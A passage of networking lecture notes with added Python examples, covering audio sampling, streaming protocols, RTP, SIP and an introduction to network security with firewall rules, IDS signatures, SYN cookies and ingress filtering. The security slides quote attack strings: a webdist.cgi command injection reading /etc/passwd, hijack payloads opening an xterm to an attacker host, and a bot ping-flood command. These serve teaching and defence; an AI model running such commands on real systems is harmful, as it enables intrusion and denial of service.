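Reproduces the slide's a)/b)/c) steps numerically: sample a sine wave every
1/rate seconds, quantize each sample to n bits, and measure the quantization
noise introduced by the finite number of bits. bit_rate_kbps reproduces the
PCM figures on the slide (samples/s * bits/sample * channels).
"""
import math


def sample(freq_hz: float, rate_hz: int, seconds: float):
    """b) sample the wave: one value every delta_t = 1/rate_hz seconds."""
    n = int(rate_hz * seconds)
    return [math.sin(2 * math.pi * freq_hz * i / rate_hz) for i in range(n)]


def quantize(samples, bits: int):
    """c) quantize to 2**bits levels spanning [-1, 1]; returns integer codes."""
    levels = 2 ** bits
    codes = []
    for s in samples:
        code = math.floor((s + 1.0) / 2.0 * levels)
        codes.append(min(max(code, 0), levels - 1))   # clamp s == 1.0 into the top level
    return codes


def dequantize(codes, bits: int):
    """Map each code back to the centre of its level, as a DAC would."""
    levels = 2 ** bits
    return [(c + 0.5) / levels * 2.0 - 1.0 for c in codes]


def quantization_noise_rms(samples, bits: int) -> float:
    """RMS of the error between the wave and its quantized reconstruction."""
    recon = dequantize(quantize(samples, bits), bits)
    return math.sqrt(sum((a - b) ** 2 for a, b in zip(samples, recon)) / len(samples))


def bit_rate_kbps(rate_hz: int, bits: int, channels: int = 1) -> float:
    """Uncompressed PCM rate = samples/s * bits/sample * channels, in Kbps."""
    return rate_hz * bits * channels / 1000


if __name__ == "__main__":
    wave = sample(440.0, 8000, 0.1)           # 100 ms of a 440 Hz tone at telephone rate
    for b in (4, 8, 16):
        print(b, "bits: noise rms =", quantization_noise_rms(wave, b))
    print("telephone", bit_rate_kbps(8000, 8), "Kbps; CD mono", bit_rate_kbps(44100, 16), "Kbps")
```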

- Analog Video - Basics
  - sequence of images flashing faster than 50/sec
  - makes the impression of a continuous movie
  - TV (black-and-white)
    - an electron beam scans the image rapidly, from left to right and from top to bottom
    - at the end of the scan (a frame) the scan retraces
    - NTSC scans 525 lines (483 effective), 30 frames/sec
    - PAL and SECAM: 625 lines (576), 25 frames/sec
    - in both, the top few and the bottom few lines are not displayed - to approximate a rectangular image on the original round CRTs
  - 25 frames/s produce smooth motion, but flicker
  - interlacing solves this: 50 half frames (fields) / sec
  - non-interlaced: progressive scanning
- Analog Video - color
  - 3 beams moving in unison for the 3 additive primary colors - Red, Green, Blue (RGB)
- Digital Video
  - a digital video is a sequence of frames (25 or 30 frames per second), each consisting of a rectangular grid of picture elements, or pixels
  - each pixel can be
    - 1 bit - black and white
    - 8 bits - to represent 256 gray levels (high-quality black and white video)
    - 24 bits for color - 16 million colors (more than enough); 8 bits each for R, G, and B
- Smoothness vs. flickering
  - Smoothness: number of different images per second (> 25/s)
  - Flicker: number of refreshes of the display per second (> 70/s)
  - good computer monitors rescan at > 70 Hz
  - the image is repainted from RAM - no interlace
- Common configurations (4:3 aspect ratio)
  - VGA (640*480), SVGA (800*600), XGA (1024*768)
  - XGA needs 472 Mbps (at 25 frames/s) - 1024*768*24*25; this requires a high-data-rate technology such as SONET
- Compression
  - storing or transmitting uncompressed video/audio requires huge resources (disk space and bandwidth)
  - compression is required to send data over the Internet
  - many compression algorithms are designed for both audio and video
  - two algorithms are required: encoding by the source and decoding by the destination (details out of scope)
- Audio and Video Services
  - three major services: streaming stored audio/video, streaming live audio/video, and real-time interactive audio/video
i. Streaming stored audio/video
- streaming means a user can listen (or watch) the file after the downloading has started
- the files are compressed and stored on a server
- examples are songs, famous lectures, movies, TV shows, video clips, ...
- such a service is usually called on-demand audio/video (VoD) - similar to a rental store
- communication is often unicast and on-demand
- there are different approaches
a. Using a Web Server
- download a compressed audio/video file as a text file
- the client can use the services of HTTP and then use a media player to play the file
- simple and does not involve streaming
  1. Establish TCP connection, send HTTP GET request
  2. Server gets file from disk, file sent back
  3. Browser writes file to disk, media player fetches file block by block and plays it
- drawbacks
  - downloading takes time; delay latency
  - downloading may not be acceptable to the owners; hence usually stored on a scratch file
b. Using a Web Server with Metafile
- the media player is directly connected to the Web server
- the Web server stores two files: the actual audio/video file and a metafile that holds information about the audio/video file
- the media player gets the URL of the audio/video file from the metafile to contact the Web server
  1. Establish TCP connection, send HTTP GET request
  2. Web server sends metafile
  3. Metafile passed to media player
  4. Media player uses URL to access the Web server
  5. Web server responds
- drawbacks
  - both the browser and the media player use the services of HTTP, designed to run over TCP; this is ok for getting the metafile, but not for getting the audio/video file
  - TCP retransmits a lost or damaged segment; not acceptable in streaming; we need to use UDP
c. Using a Media Server
- since HTTP, which accesses the Web server, and the Web server itself are designed for TCP, we need another server, a media server
- in this approach, only the media player accesses the media server and can use any protocol
  1. Establish TCP connection, send HTTP GET request
  2. Web server sends metafile
  3. Metafile passed to media player
  4. Media player uses URL to access the Media server; downloading can take place by any protocol that uses UDP
  5. Media server responds
d. Using a Media Server and RTSP
 RTSP - Real-Time Streaming Protocol - is designed to add
some functionalities to the streaming process
 the media player can send other messages: PAUSE, PLAY, ...

1. Establish TCP connection,


Send HTTP GET request
2. Web server sends metafile
3. Metafile passed to media player
4. Media player sends a SETUP
message to create connection with the
media server
5. Media server responds
6. Media player sends a PLAY message
to start playing
7. File is downloaded using a protocol
that runs over UDP
8. Connection is broken using the
TEARDOWN message
9. Media server responds
74
ii. Streaming live audio/video
 the broadcasting of radio and TV programs through the
Internet
 communication is multicast and live
 live streaming is better suited to the multicast services of IP
and the use of protocols such as UDP and RTP
iii. Real-time interactive audio/video
 the use of the Internet for people to interactively
communicate with one another
 examples are Internet telephony or voice over IP and
Internet videoconferencing; two way communication
required

75
 Characteristics of Real-Time Data
 Time Relationship
 real-time data require the preservation of the time
relationship between packets
 when there is delay between packets, jitter is introduced
 Timestamp
 to inform the receiver when each packet is to be played
 by separating the arrival time from the playback time,
jitter can be prevented
 Playback Buffer
 to store data until they are played back
 Ordering
 a sequence number for each packet is required
 a timestamp alone cannot inform the receiver that a packet
has been lost
 example: suppose the timestamps are 0, 10, and 20; if
the second packet is lost, the receiver cannot tell from the
timestamps alone

76
 Multicasting
 for audio and video conferencing and similar applications
 Mixing
 mixing means combining several streams of traffic into one
traffic
 if there is more than one source sending data at the same
time
 Support from Transport Layer Protocol
 TCP is not suitable for interactive multimedia traffic
because we cannot allow retransmission of packets
 UDP is more suitable for interactive multimedia traffic; it
supports multicasting and has no retransmission strategy;
however, UDP has no provision for timestamping,
sequencing, or mixing
 UDP is used in conjunction with a new transport protocol -
RTP
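The receiver-side logic the slides describe (sequence numbers to detect loss, timestamps plus a playback buffer to absorb jitter), as an added example that is not part of the lecture material; the packet stream, its arrival times and the Packet class are constructed for the demonstration.

```python
from dataclasses import dataclass


# Constructed sample: 10 ms of audio per packet; seq 3 never arrives and the
# inter-arrival gaps vary (jitter).  arrival is the receiver's clock in ms.
@dataclass(frozen=True)
class Packet:
    seq: int      # sequence number: detects loss and reordering
    ts: int       # media timestamp in ms: when to play, not when it arrived
    arrival: int  # receiver clock at arrival, in ms


SAMPLE_PACKETS = [
    Packet(seq=1, ts=0, arrival=100),
    Packet(seq=2, ts=10, arrival=112),
    Packet(seq=4, ts=30, arrival=135),  # seq 3 was lost on the way
    Packet(seq=5, ts=40, arrival=165),  # 30 ms after seq 4: jitter
]


def lost_sequence_numbers(packets):
    """Sequence numbers expected but never seen (reordering is tolerated)."""
    seen = {p.seq for p in packets}
    return [s for s in range(min(seen), max(seen) + 1) if s not in seen]


def max_jitter_ms(packets):
    """Largest deviation of an inter-arrival gap from the timestamp gap."""
    ordered = sorted(packets, key=lambda p: p.seq)
    gaps = [(b.arrival - a.arrival) - (b.ts - a.ts)
            for a, b in zip(ordered, ordered[1:])]
    return max((abs(g) for g in gaps), default=0)


def schedule_playback(packets, buffer_ms):
    """Return ({seq: play_time}, [late seqs]).

    Each packet plays at first_arrival + buffer_ms + (ts - first_ts): the
    timestamp, not the arrival time, fixes the playback instant, so any
    jitter up to buffer_ms is absorbed by the playback buffer."""
    ordered = sorted(packets, key=lambda p: p.seq)
    base_arrival, base_ts = ordered[0].arrival, ordered[0].ts
    play, late = {}, []
    for p in ordered:
        play_at = base_arrival + buffer_ms + (p.ts - base_ts)
        play[p.seq] = play_at
        if p.arrival > play_at:  # buffer too small for this much jitter
            late.append(p.seq)
    return play, late


def timestamp_only_view(packets):
    """What a receiver sees with timestamps but no sequence numbers: the
    20 ms gap between 10 and 30 is indistinguishable from silence."""
    return [p.ts for p in sorted(packets, key=lambda p: p.ts)]
```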

77
 RTP - Real-Time Transport Protocol
 the protocol designed to handle real-time traffic on the
Internet
 it is used in conjunction with UDP since RTP has no delivery
mechanisms (multicasting, port numbers, ...)
 it stands between UDP and the application program

 its major contributions are timestamping, sequencing, and
mixing facilities

78
 RTP allows only messages that hold data
 we need other control messages to control the flow and
quality of data and allow the recipient to send feedback to
the source
 the RTCP - Real-Time Transport Control Protocol - was
designed for this purpose
 Some application examples
 Internet Radio
 it is gaining popularity nowadays
 two approaches
1. programs are prerecorded and stored on disk; listeners
can connect to the radio station’s archives; similar to
streaming stored audio/video; it is also possible to store
each program just after it is broadcast live and running
some minutes or hours later; e.g., BBC
2. live broadcast over the Internet, may be simultaneously
with air transmission; same as streaming live
audio/video
79
 Voice over IP (Internet Telephony)
 idea: use the Internet as a telephone network
 instead of communicating over a circuit-switched network,
it allows communication between two parties over the
packet-switched Internet
 two protocols have been designed to handle this type of
communication: SIP and H.323
 H.323
 a standard by ITU to allow telephones on the public
telephone network to talk to computers connected to the
Internet

80
 H.323 architecture

 Gateway: connects the Internet to the telephone network; it
transforms a telephone network message to an Internet
message
 communicating devices are called terminals
 Gatekeeper: registers users on a LAN and knows the IP
addresses under its jurisdiction, called a zone
 H.323 is more of an architectural overview of Internet
telephony rather than a specific protocol; it references (uses)
a large number of specific protocols to establish and maintain
communication (for speech coding, call setup, signaling, data
transport, ...)

81
 G.711 (it is PCM - for audio encoding) or G.723.1: for compression
 H.245: allows the parties to negotiate the compression method;
since multiple compression algorithms are required; also used to
negotiate other aspects such as the bit rate
 Q.931: to establish and terminate connections (providing dial
tones, making ringing sounds, ...)
 H.225 (also called RAS - Registration/Administration/Status): for
registration with the gatekeeper; to join and leave the zone;
bandwidth allocation for QoS
 RTP: for actual data transmission
 RTCP: for the control of the RTP channels
82
 SIP - Session Initiation Protocol
 H.323 is large, complex, and inflexible (may be because it
was not designed by the Internet community!)
 IETF came up with SIP, an application layer protocol that
establishes, manages, and terminates a multimedia
session
 can be used to create two-party, multiparty (everyone can
hear and speak), or multicast sessions (one sender, many
receivers)
 it describes how to set up Internet telephone calls, video
conferences, and other multimedia connections
 it handles only setup, management, and termination of
sessions; other protocols, such as RTP/RTCP, are used for
data transport
 can run on either UDP or TCP
 a text-based protocol like HTTP

83
 uses messages: six types defined, each with a header and
a body
 INVITE: to initialize a session by the caller
 ACK: confirmation by the caller to the callee after the
latter answers
 BYE: terminates the session
 OPTIONS: to query a machine about its capabilities
 CANCEL: to cancel an already started initialization
process
 REGISTER: to make a connection when the callee is not
available; to track down the callee

84
 Addresses: an email address, an IP address, a telephone
number, and other types of addresses can be used to identify
the sender and receiver; but must be in SIP format (also called
scheme)

 a SIP session consists of three phases:
establishing (a three-way handshake), communicating, and
terminating
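A minimal SIP parser and per-call state machine for the three phases just listed (INVITE / 200 OK / ACK to establish, BYE / 200 OK to terminate), added here as an example and not taken from the lecture or from any SIP implementation; it is a simplification of RFC 3261 (mandatory headers only), and the Call-ID, addresses and state names are constructed.

```python
def parse_sip(raw):
    """Split a text-based SIP message into start line, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def sip_message(start_line, call_id, cseq, from_, to):
    """Build a minimal SIP request or response (mandatory headers only)."""
    return (f"{start_line}\r\nCall-ID: {call_id}\r\nCSeq: {cseq}\r\n"
            f"From: {from_}\r\nTo: {to}\r\n\r\n")


class SipDialogs:
    """Tracks state per Call-ID.  INVITE -> 200 OK -> ACK establishes the
    session; BYE -> 200 OK terminates it.  Anything out of order, or a
    message for a call we never saw, is rejected rather than acted on."""

    TRANSITIONS = {
        (None, "INVITE"): "inviting",
        ("inviting", "200 OK"): "answered",
        ("answered", "ACK"): "established",
        ("established", "BYE"): "ending",
        ("ending", "200 OK"): "terminated",
    }

    def __init__(self):
        self.state = {}

    def handle(self, raw):
        start, hdrs, _ = parse_sip(raw)
        call_id = hdrs.get("call-id")
        if not call_id or "cseq" not in hdrs:
            return "rejected: missing Call-ID or CSeq"
        # Requests: "INVITE sip:bob@... SIP/2.0"; responses: "SIP/2.0 200 OK"
        if start.startswith("SIP/2.0"):
            kind = " ".join(start.split()[1:3])
        else:
            kind = start.split()[0]
        current = self.state.get(call_id)
        new = self.TRANSITIONS.get((current, kind))
        if new is None:
            return f"rejected: {kind} not valid in state {current}"
        self.state[call_id] = new
        return new


# Constructed exchange between two parties.
CALL = "a84b4c76e66710@198.51.100.7"
ALICE, BOB = "<sip:alice@example.net>", "<sip:bob@example.net>"
EXCHANGE = [
    sip_message("INVITE sip:bob@example.net SIP/2.0", CALL, "1 INVITE", ALICE, BOB),
    sip_message("SIP/2.0 200 OK", CALL, "1 INVITE", ALICE, BOB),
    sip_message("ACK sip:bob@example.net SIP/2.0", CALL, "1 ACK", ALICE, BOB),
    sip_message("BYE sip:alice@example.net SIP/2.0", CALL, "2 BYE", BOB, ALICE),
    sip_message("SIP/2.0 200 OK", CALL, "2 BYE", BOB, ALICE),
]


def run_exchange(messages):
    """Feed a message sequence through one dialog table; return each result."""
    dialogs = SipDialogs()
    return [dialogs.handle(m) for m in messages]
```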

85
 Tracking a callee

86
9. Network Security

87
A Brief History of the World

88
Overview
• What is security?
• Why do we need security?
• Who is vulnerable?
• Common security attacks and countermeasures
• Firewalls & Intrusion Detection Systems
• Denial of Service Attacks
• TCP Attacks
• Packet Sniffing
• Social Problems

89
What is “Security”
• Dictionary.com says:
• 1. Freedom from risk or danger; safety.
• 2. Freedom from doubt, anxiety, or fear; confidence.
• 3. Something that gives or assures safety, as:
• 1. A group or department of private guards: Call building security if a visitor acts
suspicious.
• 2. Measures adopted by a government to prevent espionage, sabotage, or attack.
• 3. Measures adopted, as by a business or homeowner, to prevent a crime such as
burglary or assault: Security was lax at the firm's smaller plant.
…etc.

90
Why do we need security?
• Protect vital information while still allowing access to those who need it
• Trade secrets, medical records, etc.
• Provide authentication and access control for resources
• Guarantee availability of resources
• Ex: 5 9’s (99.999% reliability)

94
Who is vulnerable?
• Financial institutions and banks
• Internet service providers
• Pharmaceutical companies
• Government and defense agencies
• Contractors to various government agencies
• Multinational corporations
• ANYONE ON THE NETWORK

95
Common security attacks and their
countermeasures
• Finding a way into the network
• Firewalls
• Exploiting software bugs, buffer overflows
• Intrusion Detection Systems
• Denial of Service
• Ingress filtering, IDS
• TCP hijacking
• IPSec
• Packet sniffing
• Encryption (SSH, SSL, HTTPS)
• Social problems
• Education
96
Firewalls
• Basic problem – many network applications and protocols have
security problems that are fixed over time
• Difficult for users to keep up with changes and keep host secure
• Solution
• Administrators limit access to end hosts by using a firewall
• Firewall is kept up-to-date by administrators

97
Firewalls
• A firewall is like a castle with a drawbridge
• Only one point of access into the network
• This can be good or bad
• Can be hardware or software
• Ex. Some routers come with firewall functionality
• ipfw, ipchains, pf on Unix systems, Windows XP and Mac OS X have built in
firewalls

98
Firewalls

[Figure: Internet - Firewall - DMZ (web server, email server, web proxy, etc.) - Firewall - Intranet]


99
Firewalls
• Used to filter packets based on a combination of features
• These are called packet filtering firewalls
• There are other types too, but they will not be discussed
• Ex. Drop packets with destination port of 23 (Telnet)
• Can use any combination of IP/UDP/TCP header information
• man ipfw on unix47 for much more detail
• But why don’t we just turn Telnet off?

100
Firewalls
• Here is what a computer with a default Windows XP install looks like:
• 135/tcp open loc-srv
• 139/tcp open netbios-ssn
• 445/tcp open microsoft-ds
• 1025/tcp open NFS-or-IIS
• 3389/tcp open ms-term-serv
• 5000/tcp open UPnP

• Might need some of these services, or might not be able to control all
the machines on the network

101
Firewalls
• What does a firewall rule look like?
• Depends on the firewall used
• Example: ipfw
• /sbin/ipfw add deny tcp from cracker.evil.org to wolf.tambov.su telnet
• Other examples: WinXP & Mac OS X have built in and third party
firewalls
• Different graphical user interfaces
• Varying amounts of complexity and power
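A small packet filter that parses rules in the ipfw syntax shown above and evaluates packets against them in order, added here as an example (it is not ipfw's own code and supports only a subset of its grammar). The host-name and service tables are constructed so the example runs offline, and the explicit default action is our assumption.

```python
import ipaddress
import re

# Constructed name tables (documentation address ranges) instead of DNS.
HOSTS = {"cracker.evil.org": "198.51.100.7", "wolf.tambov.su": "203.0.113.12"}
SERVICES = {"telnet": 23, "ssh": 22, "http": 80}

RULE_RE = re.compile(
    r"^(?:/sbin/ipfw\s+add\s+)?(allow|deny)\s+(\w+)\s+from\s+(\S+)"
    r"(?:\s+(?!to\b)(\S+))?\s+to\s+(\S+)(?:\s+(\S+))?$")


def parse_rule(text):
    """Parse '[allow|deny] <proto> from <src> [port] to <dst> [port]'."""
    m = RULE_RE.match(text.strip())
    if not m:
        raise ValueError(f"unsupported rule: {text!r}")
    action, proto, src, sport, dst, dport = m.groups()
    return {"action": action, "proto": proto, "src": src, "sport": sport,
            "dst": dst, "dport": dport}


def _addr_match(spec, ip):
    if spec == "any":
        return True
    spec = HOSTS.get(spec, spec)  # host name -> address, else CIDR/address
    return ipaddress.ip_address(ip) in ipaddress.ip_network(spec, strict=False)


def _port_match(spec, port):
    if spec is None:  # no port given: any port
        return True
    return port == (int(spec) if spec.isdigit() else SERVICES[spec])


def rule_matches(rule, pkt):
    return (rule["proto"] in ("ip", "all", pkt["proto"])
            and _addr_match(rule["src"], pkt["src"])
            and _port_match(rule["sport"], pkt["sport"])
            and _addr_match(rule["dst"], pkt["dst"])
            and _port_match(rule["dport"], pkt["dport"]))


def filter_packet(rules, pkt, default="deny"):
    """First matching rule wins, as in ipfw; 'default' is the action for
    packets no rule mentions (we assume deny; make it explicit in practice)."""
    for rule in rules:
        if rule_matches(rule, pkt):
            return rule["action"]
    return default


# The slide's rule, followed by a permissive catch-all.
RULES = [
    parse_rule("/sbin/ipfw add deny tcp from cracker.evil.org to wolf.tambov.su telnet"),
    parse_rule("allow ip from any to any"),
]
# Blocking Telnet from everywhere instead of from one host.
RULES_NO_TELNET = [parse_rule("deny tcp from any to any telnet")]
```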

102
Intrusion Detection
• Used to monitor for “suspicious activity” on a network
• Can protect against known software exploits, like buffer overflows
• Open Source IDS: Snort, www.snort.org

103
Intrusion Detection
• Uses “intrusion signatures”
• Well known patterns of behavior
• Ping sweeps, port scanning, web server indexing, OS fingerprinting, DoS attempts, etc.
• Example
• IRIX vulnerability in webdist.cgi
• Can make a rule to drop packets containing the line
• “/cgi-bin/webdist.cgi?distloc=?;cat%20/etc/passwd”

• However, IDS is only useful if contingency plans are in place to curb
attacks as they are occurring
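The signature check described above run over constructed request lines, as an added example (not Snort's code and not from the slides). It shows why a detector normalizes percent-encoding before matching: the exact string from the slide is only one spelling of the same request. The broader metacharacter pattern is our own assumption, not a published rule.

```python
import re
from urllib.parse import unquote

# The signature from the slide, as it would appear on the wire.
WEBDIST_SIGNATURE = "/cgi-bin/webdist.cgi?distloc=?;cat%20/etc/passwd"

# Our own broader pattern (an assumption): any distloc value carrying a
# shell metacharacter, whatever command follows it.
WEBDIST_METACHAR = re.compile(r"webdist\.cgi\?distloc=[^&\s]*[;|`$]")


def normalize_path(path):
    """Percent-decode until stable (handles double encoding), lowercase."""
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.lower()


def naive_match(line):
    """Byte-for-byte match of the slide's signature."""
    return WEBDIST_SIGNATURE in line


def request_path(line):
    parts = line.split()
    return parts[1] if len(parts) >= 2 else line


def scan_request(line):
    """Return the names of the signatures that fire on one request line."""
    norm = normalize_path(request_path(line))
    hits = []
    if normalize_path(WEBDIST_SIGNATURE) in norm:
        hits.append("webdist-passwd-exact")
    if WEBDIST_METACHAR.search(norm):
        hits.append("webdist-shell-metachar")
    return hits


def scan_all(lines):
    """Map line index -> signature names, for lines that fired anything."""
    hits = {i: scan_request(line) for i, line in enumerate(lines)}
    return {i: h for i, h in hits.items() if h}


# Constructed request lines as a web server or sensor would log them.
SAMPLE_REQUESTS = [
    "GET /index.html HTTP/1.0",
    "GET /cgi-bin/webdist.cgi?distloc=?;cat%20/etc/passwd HTTP/1.0",
    "GET /cgi-bin/webdist.cgi?distloc=%3F%3Bcat%20%2Fetc%2Fpasswd HTTP/1.0",
    "GET /cgi-bin/webdist.cgi?distloc=fooarchive HTTP/1.0",
]
```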

104
Minor Detour…
• Say we got the /etc/passwd file from the IRIX server
• What can we do with it?

105
Dictionary Attack
• We can run a dictionary attack on the passwords
• The passwords in /etc/passwd are encrypted with the crypt(3) function (one-way hash)
• Can take a dictionary of words, crypt() them all, and compare with the hashed
passwords
• This is why your passwords should be meaningless random junk!
• For example, “sdfo839f” is a good password
• That is not my password
• Please don’t try it either

106
Denial of Service
• Purpose: Make a network service unusable, usually by overloading
the server or network
• Many different kinds of DoS attacks
• SYN flooding
• SMURF
• Distributed attacks
• Mini Case Study: Code-Red

107
Denial of Service
• SYN flooding attack
• Send SYN packets with bogus source address
• Why?
• Server responds with SYN ACK and keeps state about TCP half-open
connection
• Eventually, server memory is exhausted with this state
• Solution: use “SYN cookies”
• In response to a SYN, create a special “cookie” for the connection, and forget
everything else
• Then, can recreate the forgotten information when the ACK comes in from a
legitimate connection
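A stateless listener using SYN cookies as just described, added here as an example (not from the slides or any kernel): the SYN-ACK's sequence number encodes the time slot, the client's MSS class and a keyed hash of the 4-tuple, and the returning ACK is enough to rebuild the connection. The secret, the bit layout and the MSS table are simplified assumptions modelled on the Linux/BSD scheme.

```python
import hashlib
import hmac

# Constructed server secret; a real kernel rotates it and never reveals it.
SECRET = b"constructed-secret-do-not-use"
MSS_TABLE = [536, 1220, 1460]  # the only per-connection option we encode


def syn_cookie(src_ip, src_port, dst_ip, dst_port, slot, mss_idx):
    """Build the 32-bit ISN that doubles as the cookie.
    Layout: 5 bits of time slot, 3 bits of MSS index, 24 bits of HMAC over
    the 4-tuple and the slot (so it cannot be forged without SECRET)."""
    msg = f"{src_ip}:{src_port}>{dst_ip}:{dst_port}@{slot}".encode()
    digest = hmac.new(SECRET, msg, hashlib.sha256).digest()
    return (((slot & 0x1F) << 27) | ((mss_idx & 0x7) << 24)
            | int.from_bytes(digest[:3], "big"))


class StatelessListener:
    """Answers SYNs without keeping any half-open connection state."""

    def __init__(self, ip, port, max_age=2):
        self.ip, self.port, self.max_age = ip, port, max_age

    def on_syn(self, src_ip, src_port, client_mss, now_slot):
        idx = max((i for i, m in enumerate(MSS_TABLE) if m <= client_mss),
                  default=0)
        # Returned as the SYN-ACK sequence number; nothing is stored here.
        return syn_cookie(src_ip, src_port, self.ip, self.port, now_slot, idx)

    def on_ack(self, src_ip, src_port, ack_num, now_slot):
        """Rebuild the connection from the ACK, or return None when the
        acknowledgment number is not a cookie we could have issued recently."""
        cookie = (ack_num - 1) & 0xFFFFFFFF
        slot_bits, mss_idx = cookie >> 27, (cookie >> 24) & 0x7
        for age in range(self.max_age + 1):
            slot = now_slot - age
            if (slot & 0x1F) != slot_bits:
                continue
            expected = syn_cookie(src_ip, src_port, self.ip, self.port,
                                  slot, mss_idx)
            if hmac.compare_digest(expected.to_bytes(4, "big"),
                                   cookie.to_bytes(4, "big")):
                return {"peer": (src_ip, src_port), "mss": MSS_TABLE[mss_idx]}
        return None  # forged, stale, or for a different 4-tuple
```

Everything else the SYN carried (window scale, SACK permitted) is lost in this scheme, which is why kernels normally enable cookies only once the SYN queue is under pressure.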
108
Denial of Service

109
Denial of Service
• SMURF
• Source IP address of a broadcast ping is forged
• Large number of machines respond back to victim, overloading it

110
Denial of Service
[Figure: the perpetrator sends an ICMP echo with the spoofed source address of the victim to an IP broadcast address; every host on that network sends its ICMP echo reply across the Internet to the victim]
111
Denial of Service
• Distributed Denial of Service
• Same techniques as regular DoS, but on a much larger scale
• Example: Sub7Server Trojan and IRC bots
• Infect a large number of machines with a “zombie” program
• Zombie program logs into an IRC channel and awaits commands
• Example:
• Bot command: !p4 207.71.92.193
• Result: runs ping.exe 207.71.92.193 -l 65500 -n 10000
• Sends 10,000 64k packets to the host (655MB!)
• Read more at: http://grc.com/dos/grcdos.htm

112
Denial of Service
• Mini Case Study – CodeRed
• July 19, 2001: over 359,000 computers infected with Code-Red in less than 14
hours
• Used a recently known buffer exploit in Microsoft IIS
• Damages estimated in excess of $2.6 billion

113
Denial of Service
• Why is this under the Denial of Service category?
• CodeRed launched a DDOS attack against www1.whitehouse.gov from the
20th to the 28th of every month!
• Spent the rest of its time infecting other hosts

114
Denial of Service
• How can we protect ourselves?
• Ingress filtering
• If a packet arrives on an interface that has no route back to the packet's source IP,
drop it
• RFC 2267 has more information about this
• Stay on top of CERT advisories and the latest security patches
• A fix for the IIS buffer overflow was released sixteen days before CodeRed had been
deployed!
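The ingress filtering check in the RFC 2267 style described above, as an added example (not from the slides or the RFC): a longest-prefix lookup decides which interface leads back to the claimed source, and the packet is accepted only if that is the interface it arrived on. The routing table, interface names and packets are constructed.

```python
import ipaddress

# Constructed routing table of an ISP edge router: two customer links and
# an upstream link that carries the default route.
ROUTES = [
    ("0.0.0.0/0", "upstream"),
    ("198.51.100.0/24", "cust-a"),
    ("203.0.113.0/24", "cust-b"),
]


def best_route(ip):
    """Longest-prefix match: the interface the router would use to reach ip."""
    addr = ipaddress.ip_address(ip)
    best = None
    for prefix, iface in ROUTES:
        net = ipaddress.ip_network(prefix)
        if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, iface)
    return best[1] if best else None


def ingress_ok(src_ip, in_iface):
    """Accept only if the route back to the claimed source leaves through
    the interface the packet came in on (strict reverse-path check)."""
    return best_route(src_ip) == in_iface


# Constructed packets: (claimed source address, arriving interface).
SAMPLE_PACKETS = [
    ("198.51.100.7", "cust-a"),    # customer A using its own address
    ("192.0.2.5", "cust-a"),       # customer A spoofing a remote address
    ("198.51.100.7", "upstream"),  # outsider spoofing customer A's address
    ("192.0.2.5", "upstream"),     # ordinary traffic from the Internet
]


def dropped(packets):
    """The packets the ingress filter would discard."""
    return [(src, iface) for src, iface in packets if not ingress_ok(src, iface)]
```

The strict check assumes symmetric routing; on multi-homed links where replies may return over a different interface, routers offer a loose variant that only requires some route to the source to exist.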

115
TCP Attacks
• Recall how IP works…
• End hosts create IP packets and routers process them based purely on
the destination address
• Problem: End hosts may lie about other fields which do not affect
delivery
• Source address – host may trick destination into believing that the packet is
from a trusted source
• Especially applications which use IP addresses as a simple authentication method
• Solution – use better authentication methods

116
TCP Attacks
• TCP connections have associated state
• Starting sequence numbers, port numbers
• Problem – what if an attacker learns these values?
• Port numbers are sometimes well known to begin with (ex. HTTP uses port
80)
• Sequence numbers are sometimes chosen in very predictable ways

117
TCP Attacks
• If an attacker learns the associated TCP state for the connection, then
the connection can be hijacked!
• Attacker can insert malicious data into the TCP stream, and the
recipient will believe it came from the original source
• Ex. Instead of downloading and running new program, you download a virus
and execute it

118
TCP Attacks
• Say hello to Alice, Bob and Mr. Big Ears

119
TCP Attacks
• Alice and Bob have an established TCP connection

120
TCP Attacks
• Mr. Big Ears lies on the path between Alice and Bob on the network
• He can intercept all of their packets

121
TCP Attacks
• First, Mr. Big Ears must drop all of Alice’s packets since they must not
be delivered to Bob (why?)

[Figure: Alice's packets are dropped into "the void" instead of reaching Bob]

122
TCP Attacks
• Then, Mr. Big Ears sends his malicious packet with the next ISN
(sniffed from the network)

[Figure: Mr. Big Ears sends a packet carrying the expected ISN with SRC=Alice to Bob]

123
TCP Attacks
• What if Mr. Big Ears is unable to sniff the packets between Alice and
Bob?
• Can just DoS Alice instead of dropping her packets
• Can just send guesses of what the ISN is until it is accepted
• How do you know when the ISN is accepted?
• Mitnick: payload is “add self to .rhosts”
• Or, “xterm -display MrBigEars:0”

124
TCP Attacks
• Why are these types of TCP attacks so dangerous?

[Figure: a web server, a trusting web client, and a malicious user on the path between them]
125
TCP Attacks
• How do we prevent this?
• IPSec
• Provides source authentication, so Mr. Big Ears cannot pretend to be Alice
• Encrypts data before transport, so Mr. Big Ears cannot talk to Bob without
knowing what the session key is

126
Packet Sniffing
• Recall how Ethernet works …
• When someone wants to send a packet to someone else …
• They put the bits on the wire with the destination MAC address …
• And remember that other hosts are listening on the wire to detect
collisions …
• It couldn’t get any easier to figure out what data is being transmitted
over the network!

127
Packet Sniffing
• This works for wireless too!
• In fact, it works for any broadcast-based medium

128
Packet Sniffing
• What kinds of data can we get?
• Asked another way, what kind of information would be most useful to
a malicious user?
• Answer: Anything in plain text
• Passwords are the most popular

129
Packet Sniffing
• How can we protect ourselves?
• SSH, not Telnet
• Many people at CMU still use Telnet and send their password in the clear (use PuTTY instead!)
• Now that I have told you this, please do not exploit this information
• Packet sniffing is, by the way, prohibited by Computing Services
• HTTP over SSL
• Especially when making purchases with credit cards!
• SFTP, not FTP
• Unless you really don’t care about the password or data
• Can also use KerbFTP (download from MyAndrew)
• IPSec
• Provides network-layer confidentiality

130
Social Problems
• People can be just as dangerous as unprotected computer systems
• People can be lied to, manipulated, bribed, threatened, harmed, tortured,
etc. to give up valuable information
• Most humans will break down once they are at the “harmed” stage, unless
they have been specially trained

131
Social Problems
• Fun Example 1:
• “Hi, I’m your AT&T rep, I’m stuck on a pole. I need you to punch a bunch of
buttons for me”

132
Social Problems
• Fun Example 2:
• Someone calls you in the middle of the night
• “Have you been calling Egypt for the last six hours?”
• “No”
• “Well, we have a call that’s actually active right now, it’s on your calling card and it’s to
Egypt and as a matter of fact, you’ve got about $2000 worth of charges on your card and
